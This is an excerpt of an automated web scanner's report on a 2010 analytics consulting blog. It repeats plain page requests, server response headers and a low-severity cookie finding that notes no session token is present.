GET /blog/googleanalytics/63-kintiskton-llc-in-google-analytics.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=25 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:36:51 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:36:54 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:36:54 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 35329
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/googleanalytics/68-unobfuscate-gajs-file.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=25 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 01:59:08 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 01:59:09 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 01:59:10 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21372
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/googleanalytics/77-refresh-rate-content-metric.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=25 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:37:02 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:37:08 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:37:08 GMT Content-Length: 28072 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/googleanalytics/79-google-analytincs-training-emetrics-dc-2009.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=25 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 01:55:36 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 01:55:37 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 01:55:37 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21905
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/googleanalytics/86-google-analytics-intelligence.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=20 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 01:59:37 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 01:59:40 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 01:59:40 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21792
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/googleanalytics/89-dont-kill-the-messenger.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:36:51 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:36:54 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:36:54 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/googleanalytics/91-google-analytics-cookies-and-domains.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 01:55:36 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 01:55:36 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 01:55:37 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 51683
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:36:30 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:36:31 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:36:31 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 37533
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 01:12:32 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 01:12:33 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 01:12:33 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22846
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/googleanalytics/97-workshop-january-29th-dimensionator.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 01:14:58 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 01:14:59 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 01:14:59 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21520
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/googleanalytics/99-unique-keywords-by-month.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 01:27:48 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 01:27:48 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 01:27:48 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27635
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/seo.feed HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/seo.feed?type=atom Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:16:24 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 03:16:25 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 03:16:25 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21581
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/seo.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:06:43 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:06:44 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:06:44 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 21843
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/seo/59-search-ranking-position-with-ga.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:01:12 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 03:01:12 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 03:01:13 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 27674
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/seo/78-best-seo-video-matt-cutts-wordpress.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=25 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:02:07 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 03:02:07 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 03:02:08 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25507
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
